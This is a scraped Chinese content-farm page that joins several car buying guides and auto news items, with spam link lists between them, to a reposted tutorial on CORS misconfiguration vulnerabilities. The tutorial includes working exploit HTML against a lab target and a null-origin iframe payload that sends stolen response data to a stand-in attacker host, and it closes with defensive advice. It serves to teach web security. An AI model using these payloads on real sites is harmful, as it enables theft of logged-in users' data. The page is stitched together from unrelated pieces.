99萬11月25號，中期改款的創酷上市。新車運用了雪佛蘭最新的家族設計，比老款略顯“嬰兒肥”的前臉精緻了不少，車尾則變化不大。由於雪佛蘭與別克在中國市場定位的差異，與別克昂科拉出自同平台的創酷擁有更低的售價，性價比也就更高，值得推薦。

昨天行政部的妹子公布了公司春節放假時間安排，咿呀！不知不自覺又到倒着數放假日子的時候，咋就完全沒感覺到呢？

我想這張圖能充分詮釋原因了吧（害羞臉）。說回正題，眼看2016年只剩20來天的時間，叫獸盆友圈裡的4S店銷售們開始頻繁刷起“購置稅減半政策即將結束，要買車的朋友們抓緊了···”這類消息。

叫獸在這提醒一句，截止這篇文章發出前官方還沒有給出任何有關購置稅是否順延的通知，建議大家做好不會延順的準備。再說了，趁早提台車到時候開車回家過年，省得費心費力搶票還倍兒面子，這樣兩全其美的事上哪找去。

廢話時間結束，今天叫獸就選出了這8款值得推薦並且可以享受購置稅優惠政策的SUV，有喜歡的就趕緊下手吧。

首先是中國品牌系列

奇瑞 – 瑞虎3x

指導價：5.89 – 8.09萬

瑞虎3x是奇瑞剛上市的一款最新入門級SUV車型，新車採用了奇瑞家族“life in motion”設計理念，主打年輕時尚。可以說瑞虎3x是目前同級別里顏值非常高的一位（明年上市的寶駿510將會成為其最大的威脅）。

配置方面同樣厚道，除了皮質座椅、真皮方向盤以及天窗這類實用配置外，從6.49萬的次低配開始，瑞虎3x均配備了ESp車身穩定系統，這一點實屬難能可貴。如果你的預算在7萬左右，瑞虎3x是一款很適合年輕人的入門SUV。

吉利 – 帝豪GS

指導價：7.78 – 10.88萬

2016年真是吉利非常“吉利”的一年，上個月全系車型銷量首次突破10萬大關，其中帝豪GS貢獻了10078輛。

跨界風格非常符合年輕消費者的口味，精緻簡約的內飾算得上是精品中的精品。常規舒適性和安全性配置自然不用擔心，頂配版還配備了同級罕有的主動剎車和自適應性巡航系統。提醒一句，1.3T才能享受減稅政策，現在吉利的新車很搶手，喜歡這款車的要趁早喲。

廣汽傳祺 – GS4

指導價：9.98 – 16.18萬

GS4上市幾個月後迅速成為月銷量破2萬的 “黑馬”，甚至讓傳祺自己都措手不及，於是進一步加班加點提升產量。

高度原創並符合國人審美的造型是其成功的重要因素，豐富的配置則進一步提升了GS4的競爭力。前不久上市的2017款自動擋的變速箱由老款的7速雙離合更換成愛信6AT，之前令人詬病的換擋平順性有了明顯的改善。GS4全系均可減稅，有看上的抓緊了。

上汽MG – 銳騰

指導價：10.97 – 17.97萬

銳騰的市場表現或許沒有前兩位那麼火爆，但時尚個性的造型一直是MG的招牌，銳騰放在眾多國產SUV裏面絕對是十分搶眼的一位。

銳騰的另一大“殺手鐧”就是優秀的動態表現。拋開無法享受優惠政策的2.0T車型不談，1.5版本能輸出高達169ps的馬力，身上這套7速雙離合的表現也非常稱職。如果你不甘隨大流且愛好駕駛，銳騰是個不錯的選擇。

雪佛蘭 – 創酷

指導價：9.99 – 14.99萬

11月25號，中期改款的創酷上市。新車運用了雪佛蘭最新的家族設計，比老款略顯“嬰兒肥”的前臉精緻了不少，車尾則變化不大。

由於雪佛蘭與別克在中國市場定位的差異，與別克昂科拉出自同平台的創酷擁有更低的售價，性價比也就更高，值得推薦。

廣汽本田 – 繽智

指導價：12.88 – 18.98萬

廣本在先期推出的1.8L版本繽智站穩市場后推出了兩款1.5L版本，分別匹配6MT和CVT變速箱。1.5L版本不僅能享受購置稅優惠政策，還進一步降低了入門門檻，成為眾多年輕消費者的新選擇。

雖然沒有帶“T”，但絲毫不用懷疑本田在發動機方面的造詣。這台1.5L“地球夢”發動機能輕鬆驅動繽智的小身材，CVT的表現依然優秀，未來如果能將發動機噪音問題優化則更加完美。

東風日產 – 逍客

指導價：13.98 – 18.98萬

上一代逍客是最早進軍入門合資SUV市場的車型之一，完成換代后的新逍客擁有更加符合大眾審美的造型。

先前15.28萬的2.0L入門價格在如今幾乎沒有太多優勢可言，今年初推出1.2T入門版本不僅能享受減稅政策還顯著降低了油耗，於廠家於消費者都是件很划算的買賣。目前逍客比前面幾位有更大的終端優惠，感興趣的趕緊去4S店了解情況。

華晨寶馬 – X1

指導價：28.6 – 43.9萬

你沒看錯，最後登場的是一款豪華品牌SUV – BMW X1。這是2016年裡非常重要的一款SUV，不僅僅因為它叫寶馬，更因為新X1再次打破了大家對入門豪華SUV的固有印象。

新X1變得更有寶馬“味道”，冷不丁一看與X5很像，五星好評；堪比X3的乘坐空間則成為了新X1的又一大變化。

能減稅的只有18Li也就是1.5T版本。大家一定會質疑三缸和前驅的問題，叫獸在這負責任的說，1.5T的動力家用足夠，即便是高速上也沒有任何壓力；其最大的問題是發動機噪音的抑制方面有所欠缺（1.5T），沒有達到一款BMW應有的水準。至於前驅與后驅，絕大部分人開不出來差別，不必太糾結（城市SUV做好本職工作就行，真追求駕控樂趣就努力賺錢買M）。結合終端售價以及購置稅的優惠政策，1.5T是一個實惠且不失面子的選擇，誰還沒一個“藍天白雲”夢呢？

總結

叫獸還是那句話，早買早享受。不管購置稅優惠政策會不會順延，只有你有能力並且有需要，看中哪款車就去買吧，有這糾結的功夫倒不如激勵自己賺更多的錢，爭取未來去繳納10%的超豪車消費稅吧！本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多該如何選擇?

※智慧手機時代的來臨，RWD網頁設計為架站首選

※評比南投搬家公司費用收費行情懶人包大公開

※回頭車貨運收費標準

※網頁設計最專業,超強功能平台可客製化

※別再煩惱如何寫文案,掌握八大原則!

但對於指南者來說，2706mm的軸距絕對是碾壓它的2636mm軸距。日產逍客官方指導價：13。98-18。98萬此次指南者真正對手應該是逍客，但是1。4T的發動機註定是和2。0L發動機相對比的，動力方向相差無幾，不過在軸距上逍客以着10mm的距離小勝指南者。

前言

對於美系車，我們一向都有着這樣的認識，隔音好而且舒適，但價格水平卻一點都不接地氣。但是最近作為硬派SUV代表品牌的JEEp公布了最新款的指南者售價，價格竟然和一向走低價路線的日系車一樣，那麼這款jeep指南者究竟何方神聖？是否值得買呢？

Jeep指南者車身尺寸為4415*1819*1625，身材上要比起奇駿、CR-V這些對手要小上一圈。定位是一款緊湊型SUV，預售價為17到24萬之間。

外觀上非常硬朗霸氣，整體和大切諾基相似，採用了家族式的7孔進氣格柵，並且在視覺上和大燈融為一體，拉伸了整車的視覺寬度。

整車下部有着一圈塑料裝飾，可以避免小蹭刮后的補漆。車尾造型相對於以往車型來說要柔性不少，兩燈之間依然是大大的“jeep”的標識。

內飾方面則是一貫的jeep風格，比較的中庸沒有太大的特點，使用的是黑色以及米色相搭配的風格，更為適合家用以及溫馨。配置上可以看到有着自動空調、8.4英寸中控屏幕、电子手剎、一鍵啟動以及全景天窗。

在動力方面，指南者將採用的是1.4T渦輪增壓發動機或者2.4L自然吸氣發動機，前者將搭配7速雙離合變速箱，後者將搭載9AT變速箱，並且為四驅車型。

競爭對手

日產奇駿

官方指導價：18.18-26.78萬

日產奇駿在緊湊型SUV中是一個重量級选手，實力不容小覷，油耗以及空間表現優秀，不過隔音水平以及內飾用料稍顯一般。但對於指南者來說，2706mm的軸距絕對是碾壓它的2636mm軸距。

日產逍客

官方指導價：13.98-18.98萬

此次指南者真正對手應該是逍客，但是1.4T的發動機註定是和2.0L發動機相對比的，動力方向相差無幾，不過在軸距上逍客以着10mm的距離小勝指南者。

本田繽智

官方指導價：12.48-18.48萬

本田繽智是一款小型SUV，和指南者相比其實不公平，但是高配的1.8L車型價格已經和指南者相重合了，所以依然可以說是競爭對手。因為等級的關係，繽智的2610mm軸距，明顯不如指南者，而且1.8L發動機在動力上是不如1.4T發動機的，不過本田該發動機卻是更省油。

所以總的來說，這次指南者可以說是一款入門緊湊型SUV，是和着日產逍客這種定位相似。比起本田繽智以及昂科拉這類小型SUV要大上一圈，但是卻小於日產奇駿、本田C-RV這類緊湊型SUV。這次指南者上市，因為低配搭配的是1.4T發動機，售價難以下降，所以相當於是用着高配和別人競爭。這款指南者非常適合追求個性的年輕人使用，唯一就是價格應該再下降一點。本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※網頁設計公司推薦不同的風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

※南投搬家公司費用,距離,噸數怎麼算?達人教你簡易估價知識!

※教你寫出一流的銷售文案?

※超省錢租車方案

※回頭車貨運收費標準

38-12。08萬元曾經的“老三樣”，是一代人的汽車情結。但如今，“老三樣”的輝煌成就已是茶餘飯後的談資。“老三樣”除了捷達和桑塔納繼續保持強大的產品號召力，接替富康的全新愛麗舍就顯得有點舉步維艱，銷量和影響力遠遠不及前面兩位老朋友的一半。

8萬元的預算買輛合資轎車，看似是一件非常不可思議的事情。但實際上，8-10萬這一細分市場早已不是合資車的天下，而是被日益強大的自主品牌所瓜分，競爭的壓力導致了入門級合資車售價區間不斷下探。8萬元，不僅能買到更有面子的合資品牌，關鍵它們還是一些實力不錯的三廂轎車。

新捷達

指導價：7.99-13.49萬元

不管大家信不信，反正的第一台車就是捷達，嗯！沒錯，就是隨處可見的捷達教練車，幾乎每一位有駕照的朋友都是被捷達車一路虐過來的。從最開始上市至今，捷達的累計銷量已經突破360萬台車。足以可見，捷達的實力派口碑可真不是蓋得的。即然如此，那就來推薦這款近期上新市的新捷達。作為中期改款后的新捷達，形象氣質完全煥然一新，相比以往刻板沉穩的印象更加年輕且運動化，但造型還是離不開你最熟悉的大眾風格。

隨之改變的還有新捷達的內飾，無論做工質感，還是時尚感均讓你懷疑這還是捷達嗎？與此同時，新捷達總算是良心發現了，配置水準大大高於現款捷達，中控台也不再是簡陋的不成樣，而是換裝了更有逼格的大尺寸显示屏，部分車型還增加了胎壓監測，ESp，倒車雷達等實用配置，空間還一如既往的出色。總體來說，新款捷達的性價比表現進步神速。真是厲害了，我的捷達哥！

科沃茲

指導價：7.99-10.99萬元

科沃茲和科魯茲，傻傻分不清。不僅取名方式非常雷同，設計方面也找到一些共同點。雖然科沃茲長得沒有科魯茲那麼有個性，但至少在很多年輕人看來，科沃茲的外觀設計還是比較成功的，以致於甚至你可能猜不到它的起步價只要7.99萬，頂配也不超過11萬，試問這樣有吸引力的價格，又能照顧你面子的合資轎車，國產轎車還怎麼活？

值得一提的是，儘管科沃茲是台中國特供車，但你別否認，其實打着特供車的名義殺入家用車市場，銷量真的差不到哪去，10月份科沃茲的銷量已經反超大哥科魯茲了，也說明科沃茲這款新車方方面面都有不俗的實力。其中，檔次感和配置是它最大的產品亮點，時尚有質感內飾可以輕易俘虜年輕人的心。配置方面，除了最低配感覺讓人稍微不值之外，其它款車型給出的配置已經非常厚道了，好嗎？綜合對比同級競品來說，科沃茲是少有的全能选手，不失為年輕人的入門家用車的首選。

愛麗舍

指導價：8.38-12.08萬元

曾經的“老三樣”，是一代人的汽車情結。但如今，“老三樣”的輝煌成就已是茶餘飯後的談資。“老三樣”除了捷達和桑塔納繼續保持強大的產品號召力，接替富康的全新愛麗舍就顯得有點舉步維艱，銷量和影響力遠遠不及前面兩位老朋友的一半。而從今天的審美觀來看，愛麗舍雖然不是走那種很驚艷的設計路線，在同級別中屬於很夠看的，辨識度也不錯。不過，讓人不爽的是，與時尚外觀形成巨大落差的內飾感實在太low了。

但總的來說，憑藉日積月累的口碑效應，過硬的可靠性，以及同級中一流的動力性和底盤調校，尤其是遭人詬病的4AT變速箱換成6AT變速箱之後，全新愛麗舍產品力得到進一步提升。同時，再結合一個不高不低的售價區間，愛麗舍還是一款非常靠譜的合資轎車。但也有一些不得不提的槽點，比如令人抓狂的風噪胎噪，以及不夠人性化的設計。當然，相比同級的德系車型，愛麗舍的性價比優勢更突出。

鋒范

指導價：7.98-11.98萬元

在8萬元的價位上，可能更多的人會考慮飛度。但如果介意飛度是台兩廂車的話，那麼退而求其次，購買三廂車鋒范無疑是最折中的選擇。當然，鋒范的銷量也並不差，精緻動感的車身造型，迎合了年輕人的審美觀念。但真正讓人佩服的是本田的地球夢發動機技術！無論是動力性還是燃油性，“黑科技”傍手的鋒范都有可圈可點的表現，其可靠性和經濟性足夠省心省力。

此外，要論空間的話，鋒范同樣不甘落後。繼承了本田MM理念的鋒范，軸距2600mm的車內空間，卻有十足的越級表現，即使滿載5位成年人，鋒范也是應付得游刃有餘。最後，再說說人家的性價比，一般是不建議入手本田車型的最低配版，怎麼說？簡直寒酸到不忍直視，鋒范也毫不例外，不僅外觀內飾有區別對待，居然連一些很基礎的配置如收音機、遙控鑰匙都沒有。拋開鋒范在最低配車的不厚道，其次低配、中配版都能讓人心滿意足。所以，鋒范作為不追求配置年輕人的代步車，也是完全稱職的。

手裡有8萬元的購車預算，還是會陷入比較尷尬的兩難，往往是高不成低不就。心裏想着買好點的合資車，但錢包不給力。退一步買性價比更高的國產車，又有些心不甘情不願。如果有類似這樣疑慮的朋友，不妨考慮推薦的這四款入門合資轎車。本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※網頁設計公司推薦不同的風格，搶佔消費者視覺第一線

※Google地圖已可更新顯示潭子電動車充電站設置地點!!

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※別再煩惱如何寫文案,掌握八大原則!

※網頁設計最專業,超強功能平台可客製化

※回頭車貨運收費標準

五菱之光V新車發布日前我們從上汽通用五菱官網獲悉，五菱之光V車型正式上市。不過這個V和凱迪拉克並沒有什麼關係，新車共推出3款車型，售價區間為3。38-3。68萬元。動力方面均搭載1。2L自然吸氣，最大功率為82馬力，峰值扭矩116牛·米，與之匹配的是5速手動變速器。

新款捷達，眾泰看到都不想拿出皮尺

就在本月7號，神車中的神車捷達再次發布新款，作為中期改款，外觀和內飾並沒有明顯改動，可能連眾泰看到了，都不屑於拿出自己的皮尺。

（車身尺寸4501*1704*1469，軸距2604mm，）而動力方面除了1.4TSI和1.4LMpI還增加了全新的1.5L MpI發動機，最大功率81Kkw，最大扭矩150牛米，匹配5速手動和6速自動變速箱，配置上稍有提升（中控台換裝了一塊尺寸更大的液晶显示屏，並配備有USB、SD卡以及AUX接口。

此外，新車還換裝了新的三輻式多功能方向盤），根據車型的不同還配備有自動空調、座椅加熱、胎壓監測、車身穩定控制以及全皮座椅等。

老捷達陪了國人二十幾年的情懷不是所有人都懂，但是現在的捷達（老款pOLO平台）每個月還2萬多的銷量，真的只能說這個車比較高級。

途觀L 15號首發 明年1月上市

目前，據最新消息稱，上汽大眾全新途觀L將於今年12月15日首發亮相，並有望於明年1月正式上市。從曝光的圖片來看，新車的前臉基本與海外版途觀保持一致，其延續了最新家族式的設計，車身側面海外版相比則有明顯的加長，後窗的三角窗面積也更大一些。

車身尺寸（長寬高4712/1839/1673mm，）相比海外版Tiguan的車身長度加長了226mm，同時軸距增長了110mm。達到了2791mm，儘管如此車內仍採用五座布局，動力方面，將搭載1.4TSI、1.8TSI、和2.0TSI的高低功率版3款發動機可選，最大功率分別為110kW(150ps)、132kW(179ps)、147kW(200ps)/162kW(220ps)，與3款發動機匹配的均是7速DSG雙離合變速箱。

此外1.4TSI版途觀L則將保留手動擋車型。高配車型還將搭載四驅系統，而配置方面還有HUD抬頭显示、自動大燈、全景天窗、一鍵啟動、电子駐車、自動啟停、自動泊車等。這麼拽的配置還加長，到時候你不加價十幾萬我都不好意思提車啊。

五菱之光V新車發布

日前我們從上汽通用五菱官網獲悉，五菱之光V車型正式上市。不過這個V和凱迪拉克並沒有什麼關係，新車共推出3款車型，售價區間為3.38-3.68萬元。

動力方面均搭載1.2L自然吸氣，最大功率為82馬力，峰值扭矩116牛·米，與之匹配的是5速手動變速器。整車（新車的長寬高分別為4051/1575/1780毫米）軸距達到2600毫米。

其中最重要的是一改以往的中置后驅採用前置后驅的布局，除了發動機的噪音和散熱有所改善，新的布局也將令車頭有更長的緩衝區，這以後五菱宏光S的山路傳說估計要換主角的了。

天津港口奧迪事故車三折開賣

近日，據一汽-大眾內部員工爆料稱，公司內部發布了《天津港事件輕微受損進口奧迪車銷售公告》。內部員工只需3折的價格就可購買奧迪車。公告显示，一汽服貿汽車銷售中心將於12月6日至14日銷售一批國四排放進口奧迪車，此批車受2015年8月12日天津港事件輕微影響（在車庫中停放，未受到直接影響）。

車型包括（A1、A4allroad、A5、A7、S5、S6、S7、SQ5、Q5、Q7、TTS、R8）大部分進口車型。價格為市場指導價的3-5折，而且需要全款購車。此外，購車后需在2016年12月15日前落籍上牌，還需封存車籍四年。有網友表示奧迪真黑心，事故車還拿來賣，不過更多的網友則是更關心三折的奧迪哪裡有得賣？我先來一台R8。

奔馳C63被深圳交警認定為改裝車

一直以來深圳的各項交通法規都是走在全國最前線，像安全座椅和後排安全帶的強制性要求等，而深圳的交警更是妙招奇多，特別是治遠光狗的辦法都讓全國人民拍手稱快。

不過他們最近一條微博引起了車友的熱議，內容大致上整治改裝車行動，查獲非法改裝車7輛，最終全部查扣，而從照片和微信聊天記錄中我們可以看到其中有原裝的C63 AMG也被查扣，這TM就尷尬了，國內確實沒有合法改裝，那些非法改裝抓你的，但是連原廠車都不認識，只能對深圳交警說，要不拉你們進個猜車群？

本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※自行創業缺乏曝光? 網頁設計幫您第一時間規劃公司的形象門面

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※想知道最厲害的網頁設計公司"嚨底家"!

※別再煩惱如何寫文案,掌握八大原則!

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※回頭車貨運收費標準

※台中搬家公司費用怎麼算?

簡介

網站如果存CORS跨域漏洞就會有用戶敏感數據被竊取的風險。
跨域資源共享（CORS）是一種瀏覽器機制，可實現對位於給定域外部的資源的受控訪問。它擴展了同源策略（SOP）並增加了靈活性。但是，如果網站的CORS策略配置和實施不當，它也可能帶來基於跨域的攻擊。CORS並不是針對跨域攻擊（例如跨站點請求偽造（CSRF））的保護措施。

同源策略

這裏我們必須要了解一下同源策略：同源策略是一種限制性的跨域規範，它限制了網站與源域之外的資源進行交互的能力。起源於多年前的策略是針對潛在的惡意跨域交互（例如，一個網站從另一個網站竊取私人數據）而制定的。通常，它允許一個域向其他域發出請求，但不允許訪問響應。源由通信協議，域和端口號組成。
SOP是一個很好的策略，但是隨着Web應用的發展，網站由於自身業務的需求，需要實現一些跨域的功能，能夠讓不同域的頁面之間能夠相互訪問各自頁面的內容。

CORS跨域資源共享請求與響應

簡單請求

跨域資源共享（CORS）規範規定了在Web服務器和瀏覽器之間交換的標頭內容，該標頭內容限制了源域之外的域請求web資源。CORS規範標識了協議頭中Access-Control-Allow-Origin最重要的一組。當網站請求跨域資源時，服務器將返回此標頭，並由瀏覽器添加標頭Origin。
例如下面的來自站點 http://example.com 的網頁應用想要訪問 http://bar.com 的資源：
requests

1  GET /resources/public-data/ HTTP/1.1
2  Host: bar.com
3  User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre
4  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5  Accept-Language: en-us,en;q=0.5
6  Accept-Encoding: gzip,deflate
7  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
8  Connection: keep-alive
9  Referer: http://example.com/examples/access-control/simpleXSInvocation.html
10 Origin: http://example.com

response

11  HTTP/1.1 200 OK
12  Date: Mon, 01 Dec 2020 00:23:53 GMT
13  Server: Apache/2.0.61 
14  Access-Control-Allow-Origin: *
15  Keep-Alive: timeout=2, max=100
16  Connection: Keep-Alive
17  Transfer-Encoding: chunked
18  Content-Type: application/xml

第 1~9 行是請求首部。在第10行的請求頭 Origin 表明該請求來源於 http://example.com。
第 11~18 行是來自於 http://bar.com 的服務端響應。響應中攜帶了響應首部字段 Access-Control-Allow-Origin（第 14 行）。使用 Origin 和 Access-Control-Allow-Origin 就能完成最簡單的訪問控制。本例中，服務端返回的 Access-Control-Allow-Origin: * 表明，該資源可以被任意外域訪問。如果服務端僅允許來自 http://example.com 的訪問，該首部字段的內容如下：
Access-Control-Allow-Origin: http://example.com
如果跨域請求可以包含cookie的話，在服務器響應里應該有這一字段：
Access-Control-Allow-Credentials: true
這樣的話攻擊者就可以利用這個漏洞來竊取已經在這個網站上登錄了的用戶的信息（利用cookie）

漏洞利用

這裏以droabox靶場為例

這個接口會返回已登錄的用戶的信息數據，通過訪問該網頁的響應我們看到這裏可能存在CORS跨域資源共享漏洞

接下來我們就可以建立一個惡意的js代碼

<!-- cors.html -->
<!DOCTYPE html>
<html>
<head>
 <title>cors exp</title>
</head>
<body>
<script type="text/javascript">
function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {    
    if (this.status == 200) {    
    alert(this.responseText);     
    document.getElementById("demo").innerHTML = this.responseText;    
    }  
};  
xhttp.open("GET", "http://192.168.0.101/DoraBox/csrf/userinfo.php");  
xhttp.withCredentials = true;  
xhttp.send();
}
cors();
</script>
</body>
</html>

訪問這個頁面就可以獲取已登錄的用戶的信息

該惡意代碼首先定義一個函數cors，以get形式訪問目標網址，創建XMLHttpRequest對象為xhttp，通過ajax的onreadystatechange判斷請求狀態，如果請求已完成，且相應已就緒，則彈出返迴文本。

漏洞利用技巧

在之前我們了解了一些關於CORS跨域資源共享通信的一些字段含義，
CORS的漏洞主要看當我們發起的請求中帶有Origin頭部字段時，服務器的返回包帶有CORS的相關字段並且允許Origin的域訪問。
一般測試WEB漏洞都會用上BurpSuite，而BurpSuite可以實現幫助我們檢測這個漏洞。
首先是自動在HTTP請求包中加上Origin的頭部字段，打開BurpSuite，選擇Proxy模塊中的Options選項，找到Match and Replace這一欄，勾選Request header 將空替換為Origin:example.com的Enable框。
當我們進行測試時，看服務器響應頭字段里可以關注這幾個點：
最好利用的配置：
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
可能存在可利用的配置：
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
很好的條件但無法利用：
下面這組配置組合雖然看起來很完美但是CORS機制已經默認自動禁止了這種組合，算是CORS的最後一道防線
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
單一的情況
Access-Control-Allow-Origin：*
總結漏洞的原因：
1：CORS服務端的 Access-Control-Allow-Origin 設置為了 *，並且 Access-Control-Allow-Credentials 設置為false，這樣任何網站都可以獲取該服務端的任何數據了。
2：有一些網站的Access-Control-Allow-Origin他的設置並不是固定的，而是根據用戶跨域請求數據的Origin來定的。這時，不管Access-Control-Allow-Credentials 設置為了 true 還是 false。任何網站都可以發起請求，並讀取對這些請求的響應。意思就是任何一個網站都可以發送跨域請求來獲得CORS服務端上的數據。

其他可能利用漏洞的地方

解析Origin頭時出錯

一些支持從多個來源進行訪問的應用程序通過使用允許的來源白名單來實現。收到CORS請求后，會將提供的來源與白名單進行比較。如果來源出現在白名單中，那麼它會反映在Access-Control-Allow-Origin標題中，以便授予訪問權限。例如，web應用收到一個正常的請求：

GET /data HTTP/1.1
Host: bar.com
...
Origin: https://example.com

web應用根據其允許的來源列表檢查當前請求資源的來源，如果在列表中，則按以下方式反映該來源：

HTTP/1.1 200 OK
...
Access-Control-Allow-Origin: https://example.com

但在檢測來源是否存在於白名單時經常可能出現問題，一些網站可能會允許其所有的子域（包括尚未存在未來可能存在的子域）來進行訪問，或者允許其他網站的域以及其子域來訪問請求。這些請求一般都通過通配符或者正則表達式來完成，但是如果這其中出現錯誤可能就會導致給予其他未被授權的域訪問權限。例如：
例如，假設一個應用程序授予對以下列結尾的所有域的訪問權限：
examplecom
攻擊者可能可以通過註冊域來獲得訪問權限：
exeexample.com
或者，假設應用程序授予對所有以example.com開頭的域訪問權限，攻擊者就可以使用該域獲得訪問權限：
example.com.evil-user.net

利用相互受CORS信任的域來進行XSS

假如兩個互相受信任的源，如果其中一個網站存在XSS，攻擊者就可以利用XSS注入一些JavaScript代碼，利用這些代碼對信任其源的另一個網站進行敏感信息的獲取。
如果進行CORS請求時網站響應：

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://vulnerable.com
Access-Control-Allow-Credentials: true

就可以利用XSS漏洞在vulnerable.com網站上使用下面的URL來通過檢索API密鑰：
https://vulnerable.com/?xss=<script>cors-stuff-here</script>

白名單中的null值

CORS協議的一個重要安全前提是跨域請求中的Origin頭不能被偽造，這個前提並不是總是成立。Origin頭最早被提出用於防禦CSRF攻擊，它的語法格式在RFC 6564中被定義。RFC 6564規定，如果請求來自隱私敏感上下文時，Origin頭的值應該為null，但是它卻沒有明確界定什麼是隱私敏感上下文。

CORS協議復用了Origin頭，但在CORS標準中同樣缺乏對跨域請求Origin中null明確的定義和限制。有些開發者在網站上配置信任 null，用於與本地file頁面共享數據，如下所示：
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
在這種情況下，攻擊者可以使用各種技巧來生成跨域請求，該請求構造的Origin為null值。這將滿足白名單的要求，從而導致跨域訪問。例如，可以使用iframe以下格式的沙盒跨域請求來完成：

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='malicious-website.com/log?key='+this.responseText;
};
</script>"></iframe>

這就意味着任何配置有Access-Control-Allow-Origin: null和Access-Control-Allow-Credentials:true的網站等同於沒有瀏覽器SOP的保護，都可以被其他任意域以這種方式讀取內容。

CORS漏洞的自動化掃描

github上提供了一個關於掃描CORS配置漏洞的腳本
https://github.com/chenjj/CORScanner
CORScanner是一個python工具，旨在發現網站的CORS錯誤配置漏洞。它可以幫助網站管理員和滲透測試人員檢查他們針對的域/ URL是否具有不安全的CORS策略。

但是這個好像不能掃描特定接口的

預防CORS漏洞

CORS漏洞主要是由於配置錯誤而引起的。所以，預防漏洞變成了一個配置問題。下面介紹了一些針對CORS攻擊的有效防禦措施。

1. 正確配置跨域請求
   如果Web資源包含敏感信息，則應在Access-Control-Allow-Origin標頭中正確指定來源。
2. 只允許信任的網站
   看起來似乎很明顯，但是Access-Control-Allow-Origin中指定的來源只能是受信任的站點。特別是，使用通配符來表示允許的跨域請求的來源而不進行驗證很容易被利用，應該避免。
3. 避免將null列入白名單
   避免使用標題Access-Control-Allow-Origin: null。來自內部文檔和沙盒請求的跨域資源調用可以指定null來源。應針對私有和公共服務器的可信來源正確定義CORS頭。
4. 避免在內部網絡中使用通配符
   避免在內部網絡中使用通配符。當內部瀏覽器可以訪問不受信任的外部域時，僅靠信任網絡配置來保護內部資源是不夠的。
5. CORS不能替代服務器端安全策略
   CORS定義了瀏覽器的行為，絕不能替代服務器端對敏感數據的保護-攻擊者可以直接從任何可信來源偽造請求。因此，除了正確配置的CORS之外，Web服務器還應繼續對敏感數據應用保護，例如身份驗證和會話管理。

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※別再煩惱如何寫文案,掌握八大原則!

※教你寫出一流的銷售文案?

※超省錢租車方案

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※回頭車貨運收費標準